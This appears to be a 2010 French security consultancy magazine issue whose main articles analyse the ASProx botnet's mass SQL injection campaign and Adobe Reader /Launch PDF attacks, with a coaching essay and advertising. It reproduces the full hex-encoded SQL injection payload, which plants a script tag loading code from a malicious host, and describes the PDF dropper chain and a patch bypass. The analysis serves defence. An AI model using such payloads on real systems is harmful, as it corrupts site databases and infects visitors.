le retour en force des hackers

LACTUSCU 26XMCO | PARTNERS

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite. !!!!!!!!!!!!!!!!! [1]

0DAY, EXPLOITATION

S MASSIVES, PHISHIN

G, ATTAQUES CIBLEES

:

LE RETOUR EN FORCE

DES HACKERS

SOMMAIRE ASPROX et 0day PDF: Analyse des attaques

Coaching RSSI : Quelques grammes doprat ionnels dans un monde de.. .

PCI-DSS : la scur i t des appl icat ions web dans le PCI-DSS

Les confrences des derniers mois : Black Hat Europe, Hackito, SSTIC

Lactual i t du moment : 0day Java, Microsof t Help Center, LNK, Tabnabbing, JBoss HEAD

Les blogs, logiciels et extensions scurit. . .


L'A

CTU

S

CU

N2

6

Fond en 2002 par des experts en scurit, dirig par ses fondateurs, nous n'intervenons que sous forme de projets forfaitaires avec engagement de rsultats.Les tests d'intrusion, les audits de scurit, la veille en vulnrabilit constituent les axes majeurs de dveloppement de notre cabinet.

Paralllement, nous intervenons auprs de Directions Gnrales dans le cadre de missions daccompagnement de RSSI, dlaboration de schma directeur ou encore de sminaires de sensibilisation auprs de plusieurs grands comptes franais.

Pour contacter le cabinet XMCO Partners et dcouvrir nos prestations : http://www.xmcopartners.com/

WWW.XMCOPA

RTN

ERS.COM

Tests d'intrusion Mise l'preuve de vos rseaux, systmes et applications web par nos experts en intrusionUtilisation des mthodologies OWASP, OSSTMM, CCWAPSS

Audit de scurit Audit technique et organisationnel de la scurit de votre Systme d'InformationBest Practices ISO 27001, PCI DSS, Sarbanes-Oxley

Accompagnement PCI DSSConseil et audit des environnements ncessitant la certification PCI DSS Level 1 et 2.

CERT-XMCO : Veille en vulnrabilitsSuivi personnalis des vulnrabilits et des correctifs affectant votre Systme d'Information

CERT-XMCO : Rponse intrusion Dtection et diagnostic d'intrusion, collecte des preuves, tude des logs, autopsie de malware

Services :

propos du cabinet XMCO Partners :

XMCO Partners est un cabinet de conseil dont le mtier est l'audit en scurit informatique.

Vous tes concern par la scurit informatique de votre entreprise ? :

http://www.xmcopartners.comhttp://www.xmcopartners.comhttp://www.xmcopartners.comhttp://www.xmcopartners.com


XMCO avance toujours plus...

LEDITOLes vacances... XMCO... L'dito... Dur dur le retour au boulot. Bon, tout cela pour parler de cette nouvelle dition de l'ActuScu. Bien qu'un peu en retard, nous n'avons pas chm pour ce numro de notre magazine. Au sommaire, une tude du botnet ASPROX, la suite de notre article sur le coaching RSSI, une tude sur la scurisation des applications web dans le cadre d'un audit PCI DSS. Vous trouverez aussi les rsums des c o n f r e n c e s a u x q u e l l e s l e s consultants du cabinet ont pu assister, et pour finir, comme dans chaque parution, un rsum de l'actualit du moment.Bref, quoi de neuf pour cette dition ? Aprs la multitude d'annonces faites par Adrien Guinault dans le prcdent dito (cration du CERT-XMCO, lancement de l'application CERT-XMCO sur l'AppStore d'Apple, les certifications PCI QSA et ISO Lead

Auditor passes avec succs par les consultants du cabinet), difficile de rduire les nouveauts dans l'actualit de notre cabinet une nouvelle prsentation du magazine... Non, la relle nouveaut est l'arrive dmilie Daelman, notre responsable commerciale ! tant donn que le dernier numro date quelque peu, milie est dj prsente au sein du cabinet depuis quelques mois, mais cela ne m'empchera pas de lui souhaiter la bienvenue au nom de tout XMCO.En attendant les Assises, puis notre prochain numro de l'ActuScu, prenez le temps d'apprcier ce numro spcial rentre !

Charles DAGOUATConsultant Scurit

NUMRO 26

L'ACTUSECU

Rdacteur en chef :

Adrien GUINAULT

Contributeurs :

Marc BEHAR

Frdric CHARPENTIER

Yannick HAMON

Franois LEGUE

Stphane JIN

Charles DAGOUAT

CONTACTER XMCO

[email protected]

[email protected]

L'AGENDA XMCO

Assises de la scurit6 au 8 octobre 2010

mailto:[email protected]:[email protected]:[email protected]:[email protected]


SOMMAIRE

ASProx et 0dayPDF.......................................5

Analyse de deux attaques majeures

Le coaching RSSI...........................................15

E-commerce, PCI et scurit applicative.....18

Prsentation des failles applicatives et des

solutions palliatives pour atteindre les objectifs PCI

DSS.

Les confrences............................................28

Black Hat Europe, SSTIC et Hackito

LActualit scurit........................................45

Java Launch, Tabnabbing, JBOSS Head, 0dayHCP,

LNK

Les bookmarks, logiciels et extensions

scurit................................................................61

Les blogs de Didier Stevens et Carnal0wnage

REMERCIEMENTS Photos

Trevor WIILIAMS : http://www.fiz-iks.com

Photos8.com

http://www.flickr.com/photos/denemiles/

P. 45

LES CONFRENCES

P. 5

P. 15

P. 28

LACTU DU MOIS

P. 61

BOOKMARKS ET EXTENSIONSASPROX ET 0DAY: ANALYSE DES

ATTAQUES DU MOMENT

COACHING RSSI...

E-COMMERCE, PCI ET SCURIT APPLICATIVE

P. 18

ASProx : HistoriqueActe I : les premires exploitations

Revenons en janvier 2008, lorsquune attaque de grande ampleur a eu lieu sur de nombreux sites web. Plus de 70 000 sites web ont soudainement t attaqus par des pirates qui russissaient ainsi insrer des iframes au sein des pages lgitimes de nombreux sites. Ces pages tentaient principalement dexploiter la vulnrabilit MS06-014 (MDAC).

La nouvelle a fait du bruit, mais l'origine et la mthode d'exploitation sont restes floues. Certains pensaient une vulnrabilit 0day, d'autres des attaques de brute-force sur des FTP... Unique certitude, seuls les serveurs utilisant Microsoft SQL Server avec la technologie ASP ont t touchs...

Quelques jours aprs cette infection massive quelques logs sont apparus sur Internet. La cause a pu tre identifie: une injection SQL tait l'origine de cette attaque. Cependant, tout n'a pas t clairci, notamment sur la faon de mener une attaque dune telle ampleur sur des mill iers de sites web, simultanment, avec un taux de russite aussi surprenant. Scripts, outils automatiques?

Acte II : ASProx

Deux mois plus tard, mme constat... Deux vagues successives d'attaques ont utilis la mme technique a fi n d ' i n s r e r d e s i f r a m e s v e r s l e s s i t e s nmidahena.com, aspder.com ou nihaorr1.com.

En mai 2008, le mot ASProx est apparu sur la toile. Toutes les attaques prcdentes auraient t lies un botnet.

Le cheval de Troie baptis ASProx tait spcialis dans l'envoi de SPAM (fausses cartes de voeux, mises jour Windows...), mais la suite de sa mise jour, un nouveau module dvastateur aurait t ajout...


L'A

CTU

S

CU

N2

6

WWW.XMCOPA

RTN

ERS.COM

Retour sur les nouvelles attaques la mode...

Depuis quelques mois, nous remarquons une recrudescence de lactivit des pirates : injection SQL massive, Clickjacking sur des sites communautaires, exploitations de failles des logiciels PDF et Flash, Phishing ou encore attaque cible...

Ces derniers utilisent toute la panoplie du parfait pirate afin d'infecter postes de travail et des serveurs, toujours dans un but lucratif...

Certains de nos lecteurs ont sans doute t victimes du botnet ASProx ou d'attaques client-side diverses.

Dans cet article, nous tenterons de revenir en dtail sur les attaques du moment...

Adrien GUINAULTFrancois LEGUE

XMCO | Partners

ASPROX, 0-DAY, ATTAQUES CIBLES:

LES ATTAQUES DU MOMENT....

http://www.xmcopartners.comhttp://www.xmcopartners.com

Asprox comprend un binaire nomm msscntr32.exe, qui s'installe en tant que Service avec les droits SYSTEM sous le nom "Microsoft Security Center Extension". Derrire ce nom rassurant se cache le fameux module d'injection SQL qui continue causer des ravages jusqu'aujourd'hui...

Le cheval de Troie baptis ASProx est spcialis dans l'envoi de SPAM mais lors dune mise jour, un nouveau module dvastateur aurait t ajout...

Ce nouveau module utilise un fichier de configuration XML contenant un certain nombre d'informations (domaine des serveurs de contrle, requtes pour de futures recherches de cibles potentielles...)

Capture issue du blog de la socit M86

1 : serveurs de command & control2 : requte utiliser pour rechercher d'autres cibles potentielles3 : cibles

Le malware rcupre galement une liste de cibles et tente de raliser des injections SQL avec une requte type au sein des paramtres de l'application.

Requte type de tentative dinjection SQL

Nous reviendrons en dtail sur le contenu de cette requte lors de l'analyse de la dernire attaque.

l'poque, seuls 15 % des antivirus (source : Virustotal) dtectaient le malware principalement sous le nom Danmec.

Acte III: Gumblar

ASProx n'a plus fait parler de lui partir de la fin 2008, mais il est rapidement rapparu en mai 2009 avec l'attaque connue sous le nom de Gumblar (voir Actuscu n23).

Pour rappel, ce nom est originaire du nom de domaine gumblar.cn utilis lors de l'injection d'iframe au sein de milliers de sites compromis. Cette attaque de grande ampleur est galement issue d'injections SQL sans doute ralises par ASProx....

Les attaques se sont succdes durant les mois qui ont suivi : juin, octobre et dcembre 2009. Les pirates qui paraissent l'origine de ces attaques ont suivi le mme mode opratoire, en mettant jour les exploits hbergs sur les sites points par l'iframe injecte. Le cycle semble donc rgulier avec des attaques menes tous les 2 mois.

INFOLes identifiants de jeux en ligne trs priss

Des chercheurs de Symantec viennent de dcouvrir plus de 44 millions de comptes de jeux en ligne stocks sur un serveur pirate. Au total, prs de 18 sites de jeu taient concerns par ce vol dont notamment Wayi Entertainment, Play NC, World of Warcraft, Aion...Ce vol massif serait li un type de cheval de Troie (du type "Infostealer.Gampass") charg de rcuprer les logins et les mots de passe enregistrs sur les ordinateurs infects. Cependant, un autre virus baptis "Trojan.Loginck" tait utilis conjointement afin de confirmer la validit des comptes subtiliss en tentant de s'authentifier sur les sites en question. Ce dernier rpartit alors la charge parmi un grand nombre de machines compromises pour contourner les filtrages d'adresses IP aprs plusieurs tentatives infructueuses, puis remonte les logins valides et le niveau du compte pirat afin de constituer une gigantesque base de donnes...

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![6]

ANALYSE DES ATTAQUES DU MOMENT : ASPROX LACTU SCU N26

WWW.XMCOPA

RTN

ERS.COM


Acte IV : ASProx, le retour

La dernire attaque en date a t mene en juin 2010. Prs de 110 000 sites ont t compromis afin d'insrer une balise "iframe" pointant vers l'URL "http://ww.robint.us/u.js" ou encore "postfolkovs.ru"...

Les sites vers lesquels pointaient ces fichiers js hbergeaient des pages exploitant la dernire vulnrabilit critique d'Adobe Reader CVE-2010-1297.

ASProx: Analyse de l'attaque

Prambule

Aprs cet historique de quelques lignes, intressons-nous l'attaque en elle-mme. Nous ne rentrerons pas dans l'analyse du malware, mais nous tudierons toute l'injection avec une maquette et des tests raliss en grandeur nature.

Tout d'abord, toutes les injections SQL russies par les machines infectes du botnet ASProx ne concernaient que des serveurs utilisant les technologies MSSQL/ASP. Comme nous le verrons dans la suite de cet article, l'injection repose sur des fonctions et tables utilises spcifiquement sur les bases de donnes MSSQL (tables sysobjects et syscolumns...).

La dernire attaque en date a t mene en juin 2010. Prs de 110 000 sites ont t compromis afin d'insrer une balise "iframe" pointant vers l'URL "http://w w . r o b i n t . u s / u . j s " o u e n c o r e postfolkovs.ru...

tude de l'injection

Commenons notre analyse partir de logs rcuprs depuis certains sites web pirats.

L'injection SQL est ralise au sein du paramtre utm_content. Les pirates utilisent un encodage hexadcimal afin d'viter la dtection par certaines sondes IDS.

En dcodant cette longue chane, on obtient le code suivant:

/page.aspx?utm_source=campaign&utm_medium=banner&utm_campaign=campaignid&utm_content=100x200';dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428766172636861722838303030292c5b272b40632b275d29292b63417354283078334337333633373236393730373432303733373236333344363837343734373033413246324637373737324537323646363236393645373432453735373332463735324536413733334533433246373336333732363937303734334520615320764172436841722835312929207768657265205b272b40632b275d206e6f74206c696b6520272725726f62696e742527272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f523b2d2d eXEc(@s)-- 80 - xxx.xxx.xxx.xxx HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - - www.hacked.com 200




WWW.XMCOPA

RTN

ERS.COM

http://ww.robint.us/u.js%22http://ww.robint.us/u.js%22http://ww.robint.us/u.js%22http://ww.robint.us/u.js%22http://ww.robint.us/u.js%22http://ww.robint.us/u.js%22http://ww.robint.us/u.js%22http://ww.robint.us/u.js%22http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297http://www.xmcopartners.comhttp://www.xmcopartners.com

Parcourons ce code afin d'y voir plus clair:

Ligne 1 4 : dclaration des variables nommes @t et @c de type VARCHAR.@t deviendra le tableau des tables et @c le tableau des champs.

L i g n e 5 7 : o n d fi n i t i c i l e c u r s e u r TABLE_CURSOR qui balaiera les rsultats de la requte SELECT.

Ce type de procdure se dfinit de la sorte:

La requte SELECT permet de slectionner les champs de la table sysobjects dont la table est une table utilisateur ET les champs de la table syscolumns dont le type correspond du texte :-syscolumn.xtype = 99 correspond au type NTEXT-syscolumn.xtype = 35 correspond au type TEXT, -syscolumn.xtype = 231 correspond au type NVARCHAR, -syscolumn.xtype = 167 correspond au type VARCHAR

Aucun l ien apparent ne permet d'affirmer qu'un type d'application tait spcifiquement vise par ASProx...

Ligne 9 : on ouvre le contenu du curseur et on le parcourt

Ligne 10 14: on met jour tous champs du tableau @c que nous avons slectionn, issus des tables utilisateurs @t.

Chaque champ est alors converti en VARCHAR et pralablement nettoy avec la fonction rtrim() (afin de supprimer les caractres de fin de chane) puis la valeur suivante est concatne aux 8000 premiers caractres dj prsents:

0x3c736372697074207372633d687474703a2f2f77772e726f62696e742e75732f752e6a733e3c2f7363726970743e

Une petite conversion hexadcimale nous confirme que cette valeur correspond la balise script retrouve sur de nombreux sites vulnrables:

Les pirates ont pris soin d'ajouter une condition la fin de la requte pour vrifier que le champ @c ne contient pas la balise script avant l'injection.

Une injection cible??

De nombreux fichiers de logs ont t dcortiqus et corrls afin d'identifier un ventuel CMS ou un module tiers vulnrable. Cependant, aucun lien apparent ne permet d'affirmer qu'un type d'application tait spcifiquement vise par ASProx.

Toutes les applications ASP qui souffrent de failles d'injection SQL ont donc pu tre touches...




WWW.XMCOPA

RTN

ERS.COM


INFODes kits d'exploitation "up-to-date"Depuis quelques annes, les pirates se sont organiss dans la ralisationde leursoeuvresmalveillantes, en divisant et en simplifiant leurs tches. La majorit des pirates se payent donc les services d'autres pirates plus spcialiss dans la ralisation de certaines autres tches. Par exemple, le dveloppement d'outils sur mesure permettant d'accomplir certaines tches prcises comme la distribution de pourriels, ou encore la compromission de systme.

Dernirement l'outil CRiMEPACK a t mis jour, et une version 3.0 serait en cours de dveloppement. Cette suite permettrait de compromettre un systme afin de le transformer en zombie et de l'intgrer un botnet. Quatorze exploits sont intgrs dans cette arme numrique afin doptimiser les chances des pirates dans latteinte de leurs objectifs. Parmi les failles exploites, on retrouve des vulnrabilits trs rcentes : * "msiemc"-"IE7 Uninitialized Memory Corruption"CVE-2010-0806* "iepeers"-"IEPeers Remote Code Execution"CVE-2010-0806* "opera" - "Opera TN3270" CVE-2009-3269* "libtiff"-"Adobe Acrobat LibTIFF Integer Overflow"CVE-2010-0188* "spreadsheet"-"OWC Spreadsheet

Ce type de dveloppement fait de plus en plus parler de lui, et cible clairement une certaine population, vu les prix pratiqus (plus de 400 euros pour certaines versions de CRiMEPACK) et les fonctionnalits offertes...

Maquette

Maintenant que l'attaque et les consquences sont claircies, tentons de reproduire l'injection sur une maquette.Nous disposons d'un serveur Windows 2000 avec un serveur IIS 5 et une base de donnes MSSQL.

Notre page vulnrable se nomme list.asp et prend en paramtre une valeur au sein du paramtre name.

Ce paramtre est bien vulnrable comme l'illustre la capture suivante. Un simple caractre ' provoque une erreur SQL standard.

Nous insrons notre propre requte qui va injecter la balise injection d'un lien vers xmco au sein de plusieurs champs...

Comme nous l'avons voqu dans les paragraphes prcdents, la requte SQL injecte va permettre de rechercher tous les champs texte. La requte excute directement sur la base de notre application renvoie alors les champs suivants:

De nombreux logs ont t dcortiqus et corrls afin d'identifier ventuellement un CMS ou un module tiers vulnrable. Cependant, aucun lien apparent ne permet d'affirmer qu'un type d'application tait spcifiquement vise par ASProx...




WWW.XMCOPA

RTN

ERS.COM

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3269http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3269http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188http://www.xmcopartners.comhttp://www.xmcopartners.com

Aprs l'injection, les champs name et statut de notre base ont t corrompus avec la balise href injecte...

Le rsultat se rpercute sur l'affichage lors de l'accs la page list.asp.

Conclusion

L'attaque que nous venons d'analyser est redoutablement efficace. Le botnet ASProx a ainsi pu polluer le contenu de milliers de bases de donnes afin de rediriger vers des sites exploitant des vulnrabilits de logiciels "end-user".

Les pirates ciblaient uniquement les postes de travail, certainement la recherche de cartes de crdit ou d'identifiants personnels. Une telle injection couple l'utilisation de procdures stockes telle que "xp_cmdshell" aurait pu avoir des consquences bien plus graves...

Rfrences

Anatomy of the lastest Mass IIS/ASP infection :http://nsmjunkie.blogspot.com/2010/06/anatomy-of-latest-mass-iisasp-infection.html

Articles issus du blog de la socit M86:http:/ /www.m86securi ty.com/labs/ i /The-Asprox-Spambot-Resurrects,trace.1345~.asp

http://www.m86security.com/labs/i/Another-round-of-Asprox-SQL-injection-attacks,trace.1366~.asp

Rfrence CERT-XMCO:CXA-2010-0561




WWW.XMCOPA

RTN

ERS.COM

http://nsmjunkie.blogspot.com/2010/06/anatomy-of-latest-mass-iisasp-infection.htmlhttp://nsmjunkie.blogspot.com/2010/06/anatomy-of-latest-mass-iisasp-infection.htmlhttp://nsmjunkie.blogspot.com/2010/06/anatomy-of-latest-mass-iisasp-infection.htmlhttp://nsmjunkie.blogspot.com/2010/06/anatomy-of-latest-mass-iisasp-infection.htmlhttp://www.m86security.com/labs/i/The-Asprox-Spambot-Resurrects,trace.1345~.asphttp://www.m86security.com/labs/i/The-Asprox-Spambot-Resurrects,trace.1345~.asphttp://www.m86security.com/labs/i/The-Asprox-Spambot-Resurrects,trace.1345~.asphttp://www.m86security.com/labs/i/The-Asprox-Spambot-Resurrects,trace.1345~.asphttp://www.m86security.com/labs/i/Another-round-of-Asprox-SQL-injection-attacks,trace.1366~.asphttp://www.m86security.com/labs/i/Another-round-of-Asprox-SQL-injection-attacks,trace.1366~.asphttp://www.m86security.com/labs/i/Another-round-of-Asprox-SQL-injection-attacks,trace.1366~.asphttp://www.m86security.com/labs/i/Another-round-of-Asprox-SQL-injection-attacks,trace.1366~.asphttp://www.xmcopartners.com/veille/client/index.xmco?nv=CXA-2010-0561http://www.xmcopartners.com/veille/client/index.xmco?nv=CXA-2010-0561http://www.xmcopartners.comhttp://www.xmcopartners.com

Social engineering, 0dayet Adobe ReaderRappel de la faille Launch (CVE-2010-1240)

En avril 2010, une vulnrabilit a fait couler beaucoup dencre. Une fonctionnalit dcouverte par lexpert du genre, Didier Stevens, permettait dexcuter des commandes systmes ds louverture dun fichier PDF.

Cette fonction lgitime du langage PDF nomme "/Type/Action/S/Launch/Win" et peu documente a t rapidement exploite par de nombreux pirates.

Le logiciel Adobe Reader ainsi que plusieurs autres visionneuses PDF ont ainsi pu tre abuss...

Lattaque en images

Il aura fallu attendre moins dun mois avant de voir les premires attaques exploitant ce problme majeur. Les premires vagues sont arrives avec un document PDF nomm Royal_Mail_Delivery_Notice.pdf envoy par email en pice jointe. Ce PDF contient en ralit un excutable installant le virus Zeus de type banker (vol didentifiants de sites bancaires). Lors de l'ouverture du fichier PDF, une boite de dialogue apparat et demande l'utilisateur de sauvegarder le fichier en question sur le systme de fichier.Cette opration astucieuse est ralise afin d'inciter la victime enregistrer le fichier PDF sur un emplacement dfini (en l'occurrence "Mes Documents "). Si l'utilisateur ralise cette opration, une commande exploitant la fonction "/Launch" installe le virus sur la machine de la victime.

Puis trs rapidement, un trs grand nombre dentreprises ont reu plusieurs emails similaires.

Les messages malveillants de cette seconde vague ont tous t envoys depuis une adresse du type "operator@MON_ENTREPRISE.com" ou encore "alert@MON_ENTREPRISE.com". Le mail usurpait l'identit du service technique d'une socit afin d'inciter l'utilisateur ouvrir le document PDF contenant des instructions suivre pour modifier les paramtres SMTP et POP3 de son client de messagerie lectronique.

Le corps du mail, en anglais, tait toujours : SMTP and POP3 servers for mailbox are changed. Please carefully read the attached instructions before updating settings.




WWW.XMCOPA

RTN

ERS.COM

mailto:operator@MON_ENTREPRISE.commailto:operator@MON_ENTREPRISE.commailto:alert@MON_ENTREPRISE.commailto:alert@MON_ENTREPRISE.comhttp://www.xmcopartners.comhttp://www.xmcopartners.com

Le document PDF en pice jointe tait nomm doc.pdf. Une fois le document tlcharg et ouvert, quelques secondes se passaient et soudain le PDF saffichait avec une boite Lancer le fichier.

Le message affich indiquait Click the open button to view this document . Ce premier avertissement aurait d veiller les soupons des internautes...

Cependant en remontant quelques lignes avant ce message, on tombe sur un code qui cette fois-ci peut veiller les soupons de lutilisateur...

Si lutilisateur finit par cliquer sur le bouton Ouvrir, le code malicieux plac au sein du fichier PDF est alors excut...

INFOLes outils danalyse PDF

Didier Stevens est lun des experts les plus connus sur les failles et autres attaques lies aux fichiers PDF (voir section blog). Depuis la recrudescence des attaques via ce vecteur particulirement utilis en entreprise, Stevens a publi plusieurs outils permettant de parser et danalyser les fichiers PDF.

pdf-parser.py : permet de parser les documents PDF la recherche de donnes prcises (JavaScript, rfrence, objets )http://www.didierstevens.com/files/software/pdf-parser_V0_3_7.zip

make-pdf-javascript.py : permet de crer un simple fichier PDF en incluant du code JavaScripthttp://www.didierstevens.com/files/software/make-pdf_V0_1_1.zip

pdfid.py : permet de scanner et de compter des mots clefs donns utiliss lors dexploitation de vulnrabilits (/JS, /Jbig2decode, /Launch, /Richmedia...).http://www.didierstevens.com/files/software/pdfid_v0_0_11.zip

Ct franais, on retrouve galement des outils trs pratiques comme le framework Origami dvelopp par M.Raynal http://seclabs.org/



WWW.XMCOPA

RTN

ERS.COM

ANALYSE DES ATTAQUES DU MOMENT : 0DAYADOBE LACTU SCU N26

http://www.didierstevens.com/files/software/pdf-parser_V0_3_7.ziphttp://www.didierstevens.com/files/software/pdf-parser_V0_3_7.ziphttp://www.didierstevens.com/files/software/pdf-parser_V0_3_7.ziphttp://www.didierstevens.com/files/software/pdf-parser_V0_3_7.ziphttp://www.didierstevens.com/files/software/make-pdf_V0_1_1.ziphttp://www.didierstevens.com/files/software/make-pdf_V0_1_1.ziphttp://www.didierstevens.com/files/software/make-pdf_V0_1_1.ziphttp://www.didierstevens.com/files/software/make-pdf_V0_1_1.ziphttp://www.didierstevens.com/files/software/pdfid_v0_0_11.ziphttp://www.didierstevens.com/files/software/pdfid_v0_0_11.ziphttp://www.didierstevens.com/files/software/pdfid_v0_0_11.ziphttp://www.didierstevens.com/files/software/pdfid_v0_0_11.ziphttp://seclabs.orghttp://seclabs.orghttp://www.xmcopartners.comhttp://www.xmcopartners.com

Analyse de lattaque

Le document PDF attach en pice jointe en question peut tre analys laide dun simple diteur de texte.

Une recherche sur le mot cl "/Launch " nous donne:

Dans cette partie du code, on voit lappel cmd.exe. Loption/c utilise au dbut de la ligne 96 permet de lancer linterprteur et dexcuter des commandes shell.

Les commandes en question sont composes dune succession de commandes echo excutes dans le but de crer un premier fichier nomm script.vbs.

Ce fichier script.vbs est basique.

Ligne 1: cration de lobjet fso.

Ligne 2 3: le fichier PDF doc.pdf va tre parcouru laide de la fonction OpenTextFile.

Ligne 4 6: on dclare deux variables afin de dfinir deux chanes de caractres (SS et EE) puis on rcupre le texte contenu entre ces deux chanes.

Ligne 7 8 : on crit au sein du fichier batscript.vbs via la fonction Write(s) le texte rcupr entre les balises SS et EE.



WWW.XMCOPA

RTN

ERS.COM



Le contenu de ce second script respecte le mme principe savoir crer un fichier game.exe puis lexcuter sur le systme.

Cet excutable est ensuite ajout en temps que dbugger au processus "explorer.exe". Une fois cette procdure d'installation termine, le PC se connecte un canal de contrle en Core sur l'adresse IP 59.30.197.218.

Conclusion

Cette seconde attaque cible cette fois directement les utilisateurs finaux. Une fois de plus, les pirates montrent quils sadaptent trs rapidement aux v u l n r a b i l i t s p u b l i e s a fi n d i n s t a l l e r astucieusement le malware de leur choix. Le choix du full-disclosure sur les vulnrabilits 0day reste encore un dbat controvers, mais qui a malheureusement des consquences bien relles sur la scurit des internautes...

Rfrences

Rfrences CERT-XMCO :CXA-2010-0427, CXA-2010-0433, CXA-2010-0467CXA-2010-0513, CXA-2010-0523, CXA-2010-0542

Vido de lattaque:h t t p : / / w w w . y o u t u b e . c o m / w a t c h ?v=jTlwxfRqODs&feature=player_embedded

CVE-2010-1240:h t t p : / / c v e . m i t r e . o r g / c g i - b i n / c v e n a m e . c g i ?name=CVE-2010-1240

INFOAdobe Fails....

Alors qu'Adobe a publi le 30 juin une version en avance du correctif cumulatif pour Adobe Reader et Adobe Acrobat initialement prvu pour la mi-juillet (voir CXA-2010-0823), Didier Stevens a annonc le lendemain (ler juillet) avoir dcouvert une manire enfantine de le contourner.

En effet, dans le cadre de la publication avance du bulletin APSB10-015 li au correctif cumulatif initialement prvu pour la mi-juillet, Adobe a annonc avoir corrig la vulnrabilit /Launch. De son ct, un chercheur a test l'efficacit du correctif en modifiant lgrement l'exploit. En rajoutant simplement des guillemets autour de la commande, celle-ci est alors excute par Adobe Reader. Par exemple, la commande malveillante /F(cmd.exe) deviendrait /F(cmd.exe").

Cette simple modification permet de contourner le correctif propos par l'diteur amricain. Malgr la volont d'Adobe d'amliorer la scurit de ses produits (raccourcissement de la dure du cycle de publication des correctifs, ajout de Flash dans cette politique de scurit, modification et amlioration de l'outil de distribution de mise jour...), il semblerait que ses efforts n'aient pas encore port tous leurs fruits.



WWW.XMCOPA

RTN

ERS.COM


http://www.xmcopartners.com/veille/client/index.xmco?nv=CXA-2010-0427http://www.xmcopartners.com/veille/client/index.xmco?nv=CXA-2010-0427http://www.xmcopartners.com/veille/client/index.xmco?nv=CXA-2010-0433http://www.xmcopartners.com/veille/client/index.xmco?nv=CXA-2010-0433http://livepage.apple.com/http://livepage.apple.com/http://livepage.apple.com/http://livepage.apple.com/http://www.xmcopartners.com/veille/client/index.xmco?nv=CXA-2010-0523http://www.xmcopartners.com/veille/client/index.xmco?nv=CXA-2010-0523http://livepage.apple.com/http://livepage.apple.com/http://www.youtube.com/watch?v=jTlwxfRqODs&feature=player_embeddedhttp://www.youtube.com/watch?v=jTlwxfRqODs&feature=player_embeddedhttp://www.youtube.com/watch?v=jTlwxfRqODs&feature=player_embeddedhttp://www.youtube.com/watch?v=jTlwxfRqODs&feature=player_embeddedhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1240http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1240http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1240http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1240http://www.xmcopartners.comhttp://www.xmcopartners.com

Le coaching oprationnel

Voici quelques dfinitions trouves sur le Web propos du coaching:

Ensemble des techniques permettant l'optimisation des potentiels existants chez une personneProcessus d'accompagnement d'une personne dans sa vie et dans ses choix personnels et professionnels; le coach est un facilitateur qui aide la personne prendre conscience de ses besoins et mobiliser ressources.Suivi de la vie professionnelle, dans une contrainte de temps pour aider une personne mettre en place un projet.

Comme nos prospects et nos clients nous le font souvent remarquer, cela ne veut rien dire. Ces dfinitions restent tellement vagues, tellement ouvertes, tellement subjectives que le concept na plus aucun sens.

Dans ce genre de situation, puisque le terme, qui nest mme pas franais, na aucun sens, mon rle de conseil est dy adjoindre des termes censs lui donner une signification plus explicite. Un des termes qui me parat appropri ce que nous ralisons pour nos clients en terme de coaching est oprationnel . Dune certaine manire, cet adjectif pragmatique semble rendre concret lensemble du concept, en lui affectant une dimension plus comprhensible.

Pour tenter de vulgariser lide, le coaching oprationnel est une forme de mission de conseil ralise par un cabinet dexperts en mesure de prendre des risques pour ses clients. Cest finalement loppos des missions des SSII qui passent leur temps essayer de se protger contre dventuels checs, ou rats. Quels types de risques ? Celui qui consiste donner son avis, sengager pour ses convictions propres et accepter de raliser des missions difficiles.

Redorer le blason de la scurit, travers la mise en place dune communication adapte, produire des outils performants sur du long terme pour son client, prparer un argumentaire stratgique pour informer et valider ladhsion dun comit de Direction sont autant dexemples que de besoins rencontrs chez nos clients. Bien entendu, la raction instinctive de toute personne normalement constitue est de refuser ce type de mission, face lampleur de la tche. Est-ce inn de savoir comment sensibiliser les 50 000 collaborateurs dun Groupe la scurit, qui se trouveraient rpartis dans 80 pays dans le monde ? Non, forcment, non. Nanmoins, lorsque le besoin est exprim, faut-il, par peur de lchec, refuser de ladresser?

le coaching oprationnel est une forme de mission de conseil ralise par un cabinet dexperts en mesure de prendre des risques pour ses clients


WWW.XMCOPA

RTN

ERS.COM

L'A

CTU

S

CU

N2

6

COACHING RSSI Coaching RSSI : ou la parfaite quation entre stratgie et oprationnelCe deuxime article poursuit la srie sur notre thme sur le coaching RSSI.

Marc Behar nous prsente les diffrentes facettes du coaching et la faon dont certaines problmatiques sont abordes lors dune mission de ce type.

Marc BEHAR

XMCO | Partners


